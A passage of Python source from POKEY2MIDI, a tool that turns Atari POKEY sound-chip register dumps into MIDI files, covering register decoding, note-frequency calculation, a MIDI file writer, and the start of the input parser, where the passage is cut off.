data[7])\n\t\tself.writeAUDCTL(data[8])\n\t\n\tdef writeAUDC(self, ch, data):\n\t\tassert ch > 0\n\t\tself.vol[ch-1]\t\t= data & 0b00001111 # 4-bit channel volume\n\t\tself.volctrl[ch-1]\t= data >> 4 & 1 # Volume Control only (for writing PCM)\n\t\tself.poly[ch-1]\t\t= data >> 5 # Poly\n\t\t# Note: Poly is meaningless if volctrl is on\n\t\t# Otherwise, they are:\n\t\t# 0=0b000\t17 Bit poly - 5 Bit poly - N\n\t\t# 1=0b001\t5 Bit poly - N - 2\n\t\t# 2=0b010\t4 Bit poly - 5 Bit poly - N\n\t\t# 3=0b011\t5 Bit poly - N - 2\n\t\t# 4=0b100\t17 Bit poly - N\n\t\t# 5=0b101\tPure Tone - N - 2\n\t\t# 6=0b110\t4 Bit poly - N\n\t\t# 7=0b111\tSame as #5 (Not documented)\n\t\t\n\tdef writeAUDF(self, ch, data):\n\t\tassert ch > 0\n\t\tself.audf[ch-1] = data\n\t\n\tdef writeAUDCTL(self, data):\n\t\tself.use15khz\t\t= data >> 0 & 1 # Use 15 kHz clock for all channels, instead of 64 kHz\n\t\tself.highpass2w4\t= data >> 1 & 1 # Highpass channel 2 with 4\n\t\tself.highpass1w3\t= data >> 2 & 1 # Highpass channel 1 with 3\n\t\tself.join4and3\t\t= data >> 3 & 1 # Clock channel 4 with 3 (instead of 64 kHz) (16-bit)\n\t\tself.join2and1\t\t= data >> 4 & 1 # Clock channel 2 with 1 (instead of 64 kHz) (16-bit)\n\t\tself.clock3mhz\t\t= data >> 5 & 1 # Clock channel 3 with 1.79 MHz, instead of 64 kHz\n\t\tself.clock1mhz\t\t= data >> 6 & 1 # Clock channel 1 with 1.79 MHz, instead of 64 kHz\n\t\tself.poly17as9\t\t= data >> 7 & 1 # 9-bit poly instead of 17-bit poly\n\t\t\n\t@property\n\tdef AUDCTLFeatures(self):\n\t\taudctl_features = set()\n\t\tif self.use15khz:\n\t\t\taudctl_features.add(\"15khz\")\n\t\tif self.highpass2w4:\n\t\t\taudctl_features.add(\"highpass2w4\")\n\t\tif self.highpass1w3:\n\t\t\taudctl_features.add(\"highpass1w3\")\n\t\tif self.join4and3:\n\t\t\taudctl_features.add(\"join4and3\")\n\t\tif self.join2and1:\n\t\t\taudctl_features.add(\"join2and1\")\n\t\tif self.clock3mhz:\n\t\t\taudctl_features.add(\"clock3mhz\")\n\t\tif self.clock1mhz:\n\t\t\taudctl_features.add(\"clock1mhz\")\n\t\tif self.poly17as9:\n\t\t\taudctl_features.add(\"poly17as9\")\n\t\treturn audctl_features\n\t\n\t@property\n\tdef clock(self): # current global clock, set by AUDCTL\n\t\treturn self.CLOCK_15kHz if self.use15khz else self.CLOCK_64kHz\n\t\n\t# Get the effective frequency for a channel. From the references docs:\n\t# The Normal formula for the output frequency is:\n\t# Fout = Fin /2N\n\t# where N = the binary number in the frequency register (AUDF), plus 1 (N=AUDF+1).\n\t# The Modified formula should be used when Fin = 1.79 MHz and a more exact result is desired\n\t# Fout = Fin /2(AUDF+M)\n\t# where \n\t# M = 4 if 8 bit counter (AUDCTL bit 3 or 4 = 0), \n\t# M = 7 if 16 bit counter (AUDCTL bit 3 or 4 = 1)\n\t#\n\t# The 1.79MHz (1.78979 MHz, to be exact) clock rate is required to obtain the full range of\n\t# output frequencies. The formula for determining output frequency is a little different:\n\t# F0 = F/(2*(AUDF + 7)). In this case, AUDF is the two-byte frequency register value.\n\t# The second register of the pair is the low order byte, either AUDF2 or AUDF4.\n\t# For example, to use 1049 as a divider with registers 1 and 2, we would POKE 4 in AUDF2\n\t# and 25 in AUDF1.\n\t#\n\t#\n\t# TODO: We don't really get the frequency from fin/N directly, actually. What we get\n\t# is the frequency of the pure tone. Poly counters modify this to generate a timbre, so\n\t# we need to consider their timbre periods to get the proper frequency.\n\tdef getFrequency(self, ch):\n\t\tassert ch > 0\n\t\t\n\t\tif self.volctrl[ch-1]: # DC mode means no note available, has to be transcribed by hand!\n\t\t\treturn 0\n\t\t\n\t\t# Debug currently unhandled poly settings\n\t\t# Emulate frequencies so that the MIDI note number is the AUDF value for the channel\n\t\tif DEBUG_POLYS and self.poly[ch-1] not in [5,6,7]:\n\t\t\treturn 27.5 * math.pow(2,(self.audf[ch-1] - 21)/12)\n\t\t\n\t\t# TODO: For now only, we'll only handle possibly tonal sounds.\n\t\t# The noisier ones will have to be handled in a better way.\n\t\tif self.poly[ch-1] not in [5,6,7]:\n\t\t\treturn 27.5\n\t\t\n\t\t# TODO: figure out if the clock modifies fout of ch 4 and 2 or just 3 and 1\n\t\t# It's unclear if Fin is technically considered 1.79 MHz for 4/2 getting clocked with 3/1\n\t\t# if 3/1 are at 1.79 MHz\n\t\t# Test this on an emulator to figure out\n\t\t\n\t\tclock = self.clock # Current clock to be used\n\t\taudf = self.audf[ch-1] # register value to be used (8-bit or 16-bit)\n\t\tm = 1 # modifier value on the divide by N expression\n\t\t\n\t\t# 16-bit handling\n\t\tif ENABLE_16BIT:\n\t\t\t# TODO: Test this out on emulator, verify this logic\n\t\t\tif ch == 1:\n\t\t\t\tif self.join2and1: # Channel 1 is disabled if in 16-bit mode\n\t\t\t\t\treturn 0\n\t\t\t\telse: # If not joined with channel 2\n\t\t\t\t\tif self.clock1mhz: # We modify the clock, if necessary\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 7 # Modifier is 7\n\t\t\tif ch == 2:\n\t\t\t\tif self.join2and1: # Channel 2 is used for sound in 16-bit mode\n\t\t\t\t\t# Create 16-bit AUDF with 2 and 1\n\t\t\t\t\taudf = self.audf[1] * 256 + self.audf[0]\n\t\t\t\t\t# TODO: verify this on an emulator\n\t\t\t\t\tif self.clock1mhz: # If 1 is using the MHz clock, so will this\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 4\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\t# Do same for 3 and 4\n\t\t\tif ch == 3:\n\t\t\t\tif self.join4and3: # Channel 3 is disabled if in 16-bit mode\n\t\t\t\t\treturn 0\n\t\t\t\telse: # If not joined with channel 4\n\t\t\t\t\tif self.clock3mhz: # We modify the clock, if necessary\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 7 # Modifier is 7\n\t\t\tif ch == 4:\n\t\t\t\tif self.join4and3: # Channel 4 is used for sound in 16-bit mode\n\t\t\t\t\t# Create 16-bit AUDF with 4 and 3\n\t\t\t\t\taudf = self.audf[3] * 256 + self.audf[2]\n\t\t\t\t\tif self.clock3mhz: # If 3 is using the MHz clock, so will this (again, verify?)\n\t\t\t\t\t\tclock = self.CLOCK_MHz\n\t\t\t\t\t\tm = 4\n\t\t\t\telse:\n\t\t\t\t\tpass\n\t\t\n\t\t# Compute final frequency divider (for a half wave)\n\t\tN = (audf + m)\n\t\t\n\t\t# This isn't enough to get us the proper frequency, because N is actually the desired\n\t\t# period of repetition of half a waveform we're playing, generated by the polynonomial\n\t\t# counters. As such, different poly combinations will result in longer or shorter periods.\n\t\t# We must account for this. The periods of the polys are:\n\t\tT_POLY4 = 15\n\t\tT_POLY5 = 31\n\t\tT_POLY9 = 511\n\t\tT_POLY17 = 131071\n\t\tT_PURE = 2\n\t\t\n\t\t# TODO: Actually figure out how to map these noises to something more useful (percussions or\n\t\t# seashore/helicopter/drum instruments, etc)\n\t\t# 17 and 9 polys are basically noise, no need to count it properly as they have no\n\t\t# discernible frequency. For now, we could assume some other period that maps most common\n\t\t# notes to the mid-range to be used later?\n\t\t# But that's not really useful, is it?\n\t\t\n\t\t# The periods of the 8 polys, given by the specifications (slightly modified)\n\t\t# TODO: Use emulator and figure out the exact frequencies obtained\n\t\t# It may be that the lowest bit being set adds a factor of 2 everytime, with T_PURE = 1\n\t\tperiods = [\n\t\t\tT_POLY17 * T_POLY5, # 0=0b000\t17 Bit poly + 5 Bit poly = White noise\n\t\t\tT_POLY5, # 1=0b001\t5 Bit poly = Low tone\n\t\t\tT_POLY4 * T_POLY5, # 2=0b010\t4 Bit poly + 5 Bit poly = Low buzz tone\n\t\t\tT_POLY5, # 3=0b011\t5 Bit poly = Low tone (same as #1)\n\t\t\tT_POLY17, # 4=0b100\t17 Bit poly = Soft noise\n\t\t\tT_PURE, # 5=0b101\tPure Tone\n\t\t\tT_POLY4, # 6=0b110\t4 Bit poly - High buzz\n\t\t\tT_PURE # 7=0b111\tSame as #5 (Not documented)\n\t\t]\n\t\t\n\t\t# If AUDCTL is set to use a 9-bit poly instead of 17-bit, we change it\n\t\tif self.poly17as9:\n\t\t\tperiods[0] = T_POLY9 * T_POLY5\n\t\t\tperiods[4] = T_POLY9\n\t\t\n\t\t# TODO: Handle 0-4 which is basically noise. What to do about the 5-bit though?\n\t\t\n\t\t# Now, we multiply N by these periods to obtain the proper note corrected for timbre\n\t\tN *= periods[self.poly[ch-1]]\n\t\t\n\t\t# And return the final frequency\n\t\treturn clock / N\n\t\n\t# Get the nearest (piano) note on a channel given its tone frequency\n\t# Frequencies are exponential, so the note number is logarithmic\n\t# f = 27.5 * 2^(n/12) Hz <---> n = log2(f / 27.5)\n\t# Here, we defined n=0 -> A0, as in the piano. This is MIDI note 21\n\tdef getNote(self, ch):\n\t\tassert ch > 0\n\t\tfreq = self.getFrequency(ch)\n\t\tassert freq >= 0\n\t\t\n\t\tif freq <= 0: # Probably due to volctrl set or something else\n\t\t\treturn [None,None,0] # No note\n\t\t\n\t\t# Since the frequency division method is imprecise, we must figure out the proper\n\t\t# note heuristically. The real note we want is the standard note closest in frequency.\n\t\tn = math.log(freq / 27.5, 2)*12 # fractional note number (as in piano keys)\n\t\t# Since the frequency is exponential and not linear we must try both sides, low and high,\n\t\t# to see which is closer\n\t\tlf, hf = 27.5*math.pow(2, math.floor(n)/12), 27.5*math.pow(2, math.ceil(n)/12)\n\t\t# We use whichever note number gets us closest to a standard frequency\n\t\tif abs(freq-lf) < abs(freq-hf):\n\t\t\tnote = math.floor(n)\n\t\telse:\n\t\t\tnote = math.ceil(n)\n\t\t\n\t\t# if note < -21 or note > 234 and self.vol[ch-1] > 0:\n\t\tif note < -21 or note > 90 and self.vol[ch-1] > 0: # note is far beyond the typical piano range\n\t\t\tif DEBUG:\n\t\t\t\tprint(\"\\nWarning: Couldn't handle audible note '%d' of POKEY %d, channel %d\" % (\n\t\t\t\t\tnote, self.number, ch\n\t\t\t\t))\n\t\t\t\terrstate = dict()\n\t\t\t\terrstate['audf']\t\t= list(self.audf)\n\t\t\t\terrstate['freqs']\t\t= list([\n\t\t\t\t\t\t\t\t\t\t\t\tself.getFrequency(1), self.getFrequency(2),\n\t\t\t\t\t\t\t\t\t\t\t\tself.getFrequency(3), self.getFrequency(4)\n\t\t\t\t\t\t\t\t\t\t\t])\n\t\t\t\terrstate['vol']\t\t\t= list(self.vol)\n\t\t\t\terrstate['volctrl']\t\t= list(self.volctrl)\n\t\t\t\terrstate['poly']\t\t= list(self.poly)\n\t\t\t\terrstate['use15khz']\t= self.use15khz\n\t\t\t\terrstate['highpass2w4']\t= self.highpass2w4\n\t\t\t\terrstate['highpass1w3']\t= self.highpass1w3\n\t\t\t\terrstate['join4and3']\t= self.join4and3\n\t\t\t\terrstate['join2and1']\t= self.join2and1\n\t\t\t\terrstate['clock3mhz']\t= self.clock3mhz\n\t\t\t\terrstate['clock1mhz']\t= self.clock1mhz\n\t\t\t\terrstate['poly17as9']\t= self.poly17as9\n\t\t\t\tprint(\"POKEY state:\", errstate)\n\t\t\treturn [None, None, 0]\n\t\t\n\t\t# TODO: export human-readable note names?\n\t\tnotename = NOTES[note % 12] + \"%d\" % ((note + 9) // 12) # human-readable name\n\t\treturn (note, notename, freq) # (piano key, note name, frequency)\n\t\n\t# Get current POKEY state in a human-readable form\n\t@property\n\tdef state(self):\n\t\t# Update current state\n\t\tself._state['audf']\t\t= list(self.audf)\n\t\tself._state['note']\t\t= list([\n\t\t\t\t\t\t\t\t\t\tself.getNote(1)[0], self.getNote(2)[0],\n\t\t\t\t\t\t\t\t\t\tself.getNote(3)[0], self.getNote(4)[0]\n\t\t\t\t\t\t\t\t\t])\n\t\tself._state['vol']\t\t\t= list(self.vol)\n\t\tself._state['volctrl']\t\t= list(self.volctrl)\n\t\tself._state['poly']\t\t\t= list(self.poly)\n\t\tself._state['use15khz']\t\t= self.use15khz\n\t\tself._state['highpass2w4']\t= self.highpass2w4\n\t\tself._state['highpass1w3']\t= self.highpass1w3\n\t\tself._state['join4and3']\t= self.join4and3\n\t\tself._state['join2and1']\t= self.join2and1\n\t\tself._state['clock3mhz']\t= self.clock3mhz\n\t\tself._state['clock1mhz']\t= self.clock1mhz\n\t\tself._state['poly17as9']\t= self.poly17as9\n\t\t\n\t\treturn self._state\n\n\n# Basic MIDI writing class\nclass MIDI(object):\n\tdef __init__(self, timebase=DEFAULT_TIMEBASE, tempo=DEFAULT_TEMPO):\n\t\tself.timebase = round(timebase/24)*24 # lock to multiples of 24, as is standard\n\t\tself.tempo = tempo\n\t\tself.tracks = []\n\t\tself.numNotes = [] # number of notes in each track\n\t\t\n\t\tself.timeOffset = 0 # time to subtract from every sound (note/ctrl) event, to remove silence\n\t\tself.scaleFactor = 1.0 # scale times by this factor, to adjust for a known tempo\n\t\t\n\t\t# Initialize conductor track, initially blank\n\t\tself.newTrack()\n\t\n\t# Writes variable length number, as per MIDI standard\n\tdef variableLengthNumber(self, num):\n\t\tassert num >= 0\n\t\tlst = struct.pack(\"=B\",num & 0x7f)\n\t\twhile 1:\n\t\t\tnum = num >> 7\n\t\t\tif num:\n\t\t\t\tlst = struct.pack(\"=B\",(num & 0x7f) | 0x80) + lst\n\t\t\telse:\n\t\t\t\treturn lst\n\t\n\t# Create a new MIDI track\n\tdef newTrack(self):\n\t\tself.tracks.append(dict())\n\t\tself.numNotes.append(0)\n\t\treturn len(self.tracks)-1\n\t\n\t# Add event to a MIDI track\n\t# time is given in seconds, data is a list with event name and data\n\t# ['Event name', data...]\n\t# We use a \"Raw\" event to write arbitrary data, instead of implementing all the useless events\n\tdef addEvent(self, track, time, data):\n\t\tassert 0 <= track and track < len(self.tracks)\n\t\tticks = self.timeToTicks(time)\n\t\tassert ticks >= 0\n\t\tif ticks not in self.tracks[track]:\n\t\t\tself.tracks[track][ticks] = []\n\t\tself.tracks[track][ticks].append( data )\n\t\n\t# Add meta track name\n\tdef setTrackName(self, track, name):\n\t\tself.addEvent(track, 0, [\n\t\t\t'Raw', b\"\\xFF\\x03\" + self.variableLengthNumber(len(name.encode())) + name.encode()\n\t\t])\n\t\n\t# Add meta instrument name\n\tdef setInstrumentName(self, track, name):\n\t\tself.addEvent(track, 0, [\n\t\t\t'Raw', b\"\\xFF\\x04\" + self.variableLengthNumber(len(name.encode())) + name.encode()\n\t\t])\n\t\n\t# Add a Note On event\n\tdef noteOn(self, track, time, channel, key, velocity):\n\t\tvelocity = min(127,max(0,int(velocity))) # Force 0-127 range\n\t\ttime -= self.timeOffset # Remove offset, if any\n\t\tself.addEvent( track, time, [\n\t\t\t'On', channel, key, velocity\n\t\t])\n\t\tself.numNotes[track] += 1\n\t\n\t# Add a Note Off event\n\tdef noteOff(self, track, time, channel, key):\n\t\t# Offs can be (and are usually) treated as On events with zero velocity\n\t\tself.noteOn(track, time, channel, key, 0)\n\t\n\t# Add a Controller Change event\n\tdef ctrlChange(self, track, time, channel, ctrl, value):\n\t\ttime -= self.timeOffset\n\t\tself.addEvent( track, time, [\n\t\t\t'Ctrl', channel, ctrl, value\n\t\t])\n\t\n\t# Add a Program (Instrument) Change event\n\tdef progChange(self, track, time, channel, inst):\n\t\ttime -= self.timeOffset\n\t\tself.addEvent( track, time, [\n\t\t\t'Prog', channel, inst\n\t\t])\n\t\n\t# Convert time in seconds to MIDI ticks\n\tdef timeToTicks(self, time):\n\t\treturn round( time * self.timebase * self.scaleFactor )\n\t\n\tdef filterNotesByLength(self, cutoff):\n\t\tprint(\"Marking notes shorter than 1/%d of a beat...\" % (1.0/cutoff))\n\t\tnotes = {} # current notes being played in each channel\n\t\tfiltered = [] # notes to filter\n\t\tfor tn, track in enumerate(self.tracks): # for each track\n\t\t\tfor t in sorted(track.keys()): # we go through the timestamps\n\t\t\t\tfor en, ev in enumerate(track[t]): # and each of their events\n\t\t\t\t\tif ev[0] != \"On\": continue # we only care about Note On events\n\t\t\t\t\t_, ch, key, vel = ev\n\t\t\t\t\tif vel > 0: # NoteOn triggered\n\t\t\t\t\t\tif (ch,key) not in notes: # If not a previously active note, mark it as active\n\t\t\t\t\t\t\tnotes[(ch,key)] = (t,ev) # save its track & event\n\t\t\t\t\telse: # Otherwise, we have a NoteOff\n\t\t\t\t\t\t# We now check for the length of the note\n\t\t\t\t\t\tif (ch,key) in notes: # If it was previously active (we check just in case)\n\t\t\t\t\t\t\t# Grab info about where it began\n\t\t\t\t\t\t\tstarttime, starten = notes[(ch,key)]\n\t\t\t\t\t\t\tdur = t - starttime # compute duration (in MIDI ticks)\n\t\t\t\t\t\t\tif (dur / self.timebase) < cutoff: # If duration lower than the cutoff, we filter it\n\t\t\t\t\t\t\t\t# We append the \n\t\t\t\t\t\t\t\tfiltered.append([\n\t\t\t\t\t\t\t\t\ttn,\n\t\t\t\t\t\t\t\t\tnotes[(ch,key)],\n\t\t\t\t\t\t\t\t\t(t,ev)\n\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\tdel notes[(ch,key)]\n\t\t\t\t\t\t# else:\n\t\t\t\t\t\t\t#print(\"Invalid off note found.\")\n\t\t\t\t\t\t\t#exit()\n\t\t# We now have a list of notes to filter\n\t\tprint(\"%d note%s filtered\" % (len(filtered), \"s\" if len(filtered) != 0 else \"\"))\n\t\tfor note in filtered: # We switch channel for these very short notes\n\t\t\ttn, non, noff = note\n\t\t\t\n\t\t\tself.tracks[tn][non[0]].remove(non[1]) # remove NoteOn event\n\t\t\tnon[1][1] += 8 # tweak channel\n\t\t\t# if non[1][1] >= 9: # skip percussion MIDI channel\n\t\t\t\t# non[1][1] += 1\n\t\t\tself.tracks[tn][non[0]].append(non[1]) # append tweaked NoteOn event\n\t\t\t\n\t\t\t# Do the same with the NoteOff\n\t\t\tself.tracks[tn][noff[0]].remove(noff[1])\n\t\t\tnoff[1][1] += 8\n\t\t\t# if noff[1][1] >= 9:\n\t\t\t\t# noff[1][1] += 1 # skip percussion\n\t\t\tself.tracks[tn][noff[0]].append(noff[1])\n\t\t\t\n\t\n\t# Save MIDI to a path\n\tdef save(self, path):\n\t\t# Assemble conductor track, track 0, which must contain only meta events\n\t\tself.tracks[0] = dict()\n\t\tself.addEvent(0, 0, [\n\t\t\t'Raw', b\"\\xFF\\x51\\x03\" + struct.pack(\">L\",int(60e6/self.tempo))[1:]\n\t\t])\n\t\t\n\t\t# Watermark\n\t\tself.setTrackName(\n\t\t\t0,\n\t\t\t\"Converted with POKEY2MIDI v%s by LucasVB (http://1ucasvb.com/)\" % VERSION\n\t\t) \n\t\t\n\t\t# Only write non-empty tracks\n\t\ttracks = [self.tracks[0]] + [\n\t\t\ttrack for t, track in enumerate(self.tracks) if self.numNotes[t] > 0\n\t\t]\n\t\t\n\t\t# Write MIDI file to disk\n\t\twith open(path, \"wb\") as mf:\n\t\t\tmf.write(b\"MThd\") # header\n\t\t\tmf.write(struct.pack(\">L\", 6)) # header length\n\t\t\tmf.write(struct.pack(\">H\", 1)) # MIDI format 1 (multiple tracks, single sequence)\n\t\t\tmf.write(struct.pack(\">H\", len(tracks))) # num tracks + conductor track\n\t\t\tmf.write(struct.pack(\">H\", self.timebase)) # timebase\n\t\t\tfor track in tracks:\n\t\t\t\tmf.write(b\"MTrk\") # track header\n\t\t\t\tmf.write(struct.pack(\">L\", 0)) # track length (will overwrite later, futher down)\n\t\t\t\ttrkpos = mf.tell() # save pos for the beginning of track data, we'll use it later\n\t\t\t\t# // begin track data\n\t\t\t\t\n\t\t\t\tltick = 0 # last tick\n\t\t\t\tticks = sorted(track.keys())\n\t\t\t\tfor tick in ticks:\n\t\t\t\t\tfirst = True # first event at this tick?\n\t\t\t\t\tfor ev in track[tick]:\n\t\t\t\t\t\tif first: # If first event at this tick, we use delta and update ltime\n\t\t\t\t\t\t\tdelta = tick - ltick\n\t\t\t\t\t\t\tfirst = False\n\t\t\t\t\t\telse: # Next events at this tick are simultaneous, so their deltas are zero\n\t\t\t\t\t\t\tdelta = 0\n\t\t\t\t\t\tif ev[0] == \"Raw\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tmf.write(ev[1])\n\t\t\t\t\t\tif ev[0] == \"On\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tchannel, key, velocity = ev[1:]\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", 0x90 + channel))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", key))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", velocity))\n\t\t\t\t\t\tif ev[0] == \"Ctrl\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tchannel, ctrl, val = ev[1:]\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", 0xB0 + channel))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", ctrl))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", val))\n\t\t\t\t\t\tif ev[0] == \"Prog\":\n\t\t\t\t\t\t\tmf.write(self.variableLengthNumber(delta))\n\t\t\t\t\t\t\tchannel, inst = ev[1:]\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", 0xC0 + channel))\n\t\t\t\t\t\t\tmf.write(struct.pack(\"=B\", inst))\n\t\t\t\t\tltick = tick\n\t\t\t\t\t\n\t\t\t\t# // end generated track data\n\t\t\t\tmf.write(b\"\\x00\\xFF\\x2F\\x00\") # Obligatory End of Track marker\n\t\t\t\t# find total track size\n\t\t\t\ttrklen = mf.tell() - trkpos # find total chunk size\n\t\t\t\tmf.seek(trkpos - 4) # go back to track length data\n\t\t\t\tmf.write(struct.pack(\">L\", trklen)) # overwrite proper length\n\t\t\t\tmf.seek(trkpos + trklen) # go back to end of data chunk\n\n\n# Song management class\n# This is the class that handles POKEY states as music, to later convert to MIDI\nclass Song(object):\n\tdef __init__(self, converter):\n\t\tself.pokeys = []\n\t\tself.states = dict()\n\t\tself.music = dict()\n\t\tself.converter = converter\n\t\n\t@property\n\tdef numPOKEY(self):\n\t\treturn len(self.pokeys)\n\t\n\t# Initializes POKEYs\n\tdef initPOKEY(self, n, mode):\n\t\tself.pokeys = [POKEY(pn, mode) for pn in range(n)]\n\t\n\t# Add a new POKEY state\n\tdef addState(self, t, data):\n\t\tself.states[t] = data\n\t\n\t# Compile POKEY states into timed note information and so on\n\tdef compile(self):\n\t\tmusic = dict()\n\t\tvoices = set() # voices are different timbres at each channel and POKEY\n\t\tfeatures = set() # AUDCTL features used\n\t\tearliest_sound = 1e6 # just some big number, simplifies logic\n\t\ttotal = len(self.states)\n\t\tlpc = None # last percentage\n\t\tprint(\"Compiling song...\")\n\t\tfor n, t in enumerate(self.states):\n\t\t\tdata = self.states[t]\n\t\t\tmusic[t] = []\n\t\t\tfor pn, pokey in enumerate(self.pokeys):\n\t\t\t\tpokey.write(data[pn]) # write data to POKEY\n\t\t\t\tfeatures = features | pokey.AUDCTLFeatures # add which AUDCTL features were used\n\t\t\t\tstate = pokey.state.copy() # copy POKEY states dict\n\t\t\t\t# Append music data\n\t\t\t\tmusic[t].append({\n\t\t\t\t\t'poly': state['poly'],\n\t\t\t\t\t'note': state['note'],\n\t\t\t\t\t'vol': state['vol']\n\t\t\t\t})\n\t\t\t\tfor ch in range(4):\n\t\t\t\t\t# add voice used\n\t\t\t\t\tvoices.add( self.converter.voice(pn, ch, state['poly'][ch]) )\n\t\t\t\t\t# if this channel is producing sound\n\t\t\t\t\tif not state['volctrl'][ch] and \\\n\t\t\t\t\t\tstate['note'][ch] is not None \\\n\t\t\t\t\t\tand state['vol'][ch] > 0:\n\t\t\t\t\t\t\t# and if this sound is earlier than the known earliest sound\n\t\t\t\t\t\t\tif t < earliest_sound:\n\t\t\t\t\t\t\t\tearliest_sound = t # update earliest known sound\n\t\t\tpc = int((n+1) / total * 100) # current percentage\n\t\t\tif (pc % 10) == 0 and pc != lpc: # print multiples of 10%\n\t\t\t\t# print( \"%d%% \" % pc, end=\"\" )\n\t\t\t\tlpc = pc\n\t\t\n\t\tprint(\"Done!\")\n\t\tvoices = sorted(voices) # update voices from set to ordered list\n\t\t# Save results to memory\n\t\tself.music = music\n\t\tself.voices = voices\n\t\tself.times = list(sorted(music.keys()))\n\t\tself.earliestSound = earliest_sound\n\t\t# Display AUDCTL features used\n\t\tprint( \"AUDCTL features used:\", \", \".join(list(features)) if len(features) else \"None\" )\n\t\t\n\n# Main POKEY2MIDI program class, which handles everything\nclass Converter(object):\n\t\n\tdef __init__(self):\n\t\t# Set default options\n\t\t\n\t\t# Always retrigger notes, regardless of changes\n\t\tself.AlwaysRetrigger = False\n\t\t# Merge decaying notes into a single MIDI note\n\t\tself.MergeDecays = True\n\t\t# Boost note velocity (increases loudness)\n\t\tself.BoostVelocity = 1.0\n\t\t# Time limit (do not convert past this point)\n\t\tself.TimeLimit = None\n\t\t# Split different polynomial counter settings for channels as separate instrument tracks\n\t\tself.SplitPolyAsTracks = True\n\t\t# Use short track names\n\t\tself.ShortTrackNames = False\n\t\t# Trim initial silence (first note plays immediately)\n\t\tself.TrimSilence = True\n\t\t# Force a specific tempo\n\t\tself.ForceTempo = None\n\t\t# Attempt to detect song tempo with a simple algorithm\n\t\t# Display the results aftewards\n\t\tself.DetectTempo = False\n\t\t# Force a specific timebase\n\t\tself.ForceTimebase = None\n\t\t# Don't use note velocities for note loudness. Use the channel volume instead.\n\t\t# TODO: Fix potential issue with multiple tracks on same channel\n\t\tself.UseChannelVolume = False\n\t\t# Assign MIDI instruments to MIDI channels to emulate the original POKEY sound\n\t\tself.UseInstruments = False\n\t\t# Custom instruments to use\n\t\tself.CustomInstruments = None\n\t\t# Ignore volume information\n\t\tself.PitchOnly = None\n\t\t# Mark short notes\n\t\tself.MarkShortNotes = False\n\t\tself.ShortNoteCutoff = 1e3;\n\t\n\t# Get a string tag for a given voice\n\t# A voice exists for each instrument for each channel for each POKEY\n\t# If we are not splitting different polynomial counters as instruments, the channels are the\n\t# voices themselves\n\tdef voice(self, pn, ch, poly):\n\t\tif self.SplitPolyAsTracks:\n\t\t\treturn \"%d %s %s\" % (pn, ch+1, poly)\n\t\telse:\n\t\t\treturn \"%d %s\" % (pn, ch+1)\n\t\n\t# Main conversion function\n\tdef convert(self, file, output):\n\t\t\n\t\tif not os.path.isfile(file):\n\t\t\tprint(\"File \\\"%s\\\" doesn't exist\" % file)\n\t\t\treturn\n\t\t\n\t\tif os.path.splitext(os.path.basename(file))[1].lower() == \"sap\": # Wrong usage\n\t\t\tprint(\"Error: POKEY2MIDI does not convert SAP files directly to MIDI.\")\n\t\t\tprint(\" You must use ASAPSCAN and save the POKEY register dumps to a text file, then run POKEY2MIDI on the text file.\")\n\t\t\tprint(\" Download ASAP: http://asap.sourceforge.net/\")\n\t\t\texit()\n\t\t\n\t\tself.file = file\n\t\t\n\t\tsong = Song(self) # The song object which will handle things\n\t\t\n\t\tprint(\"=\"*20 + \"[ POKEY2MIDI v%s ]\"%VERSION + \"=\"*20)\n\t\tprint(\"Opening \\\"%s\\\"\" % self.file)\n\t\t\n\t\t\n\t\t# Detect MIME type\n\t\tmime = mimetypes.guess_type(self.file)\n\t\tif mime[0] != \"text/plain\" or mime[1] is not None and mime[1] != \"bzip2\":\n\t\t\tprint(\"ERROR\\nIncorrect input format.\")\n\t\t\texit()\n\t\tif mime[1] == \"bzip2\":\n\t\t\thandle = bz2.open(self.file, \"rt\")\n\t\telif mime[1] == None:\n\t\t\thandle = open(self.file, \"rt\")\n\t\t\n\t\twith handle as fin:\n\t\t\tprint(\"Reading POKEY data...\")\n\t\t\t\n\t\t\t# Detect NTSC or PAL, skip to the 61st line, where we can tell them apart\n\t\t\t# NTSC will have timestamp 1.00, PAL will have 1.20\n\t\t\tfor ln in range(61):\n\t\t\t\tl = fin.readline()\n\t\t\t\n\t\t\tif l.split(\":\")[0].strip() == \"1.00\":\n\t\t\t\tmode = NTSC\n\t\t\t\tdt = DT_NTSC # the correct time between frames for NTSC\n\t\t\telse:\n\t\t\t\tmode = PAL\n\t\t\t\tdt = DT_PAL # the correct time between frames for PAL\n\t\t\t\n\t\t\t# Reset reading pointer\n\t\t\tfin.seek(0)\n\t\t\t\n\t\t\tln = 0 # line number\n\t\t\tfor l in fin:\n\t\t\t\tl = re.sub(r\"[\\n\\r\\:]\", \"\", l.strip()) # get rid of EOL characters and colon\n\t\t\t\tl = re.sub(r\"\\s+\", \" \", l) # get rid of extra spaces\n\t\t\t\tif l == \"NO RESPONSE\": # Stop at end of POKEY data, if any (for finite songs)\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\t# Extract timestamp from the rest\n\t\t\t\ttokens = l.split(\" \")\n\t\t\t\ttry:\n\t\t\t\t\tif len(tokens) != 10 and len(tokens) != 20:\n\t\t\t\t\t\traise\n\t\t\t\t\tdata = (\" \".join(tokens[1:])).split(\"|\")\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"ERROR\\nIncorrect input format.\")\n\t\t\t\t\texit()\n\t\t\t\t\n\t\t\t\tif ln == 0: # Setup metadata if we just parsed the first line\n\t\t\t\t\tnumPOKEY = len(data)\n\t\t\t\t\t# Assume zeroed out registers initially\n\t\t\t\t\tlast_data = 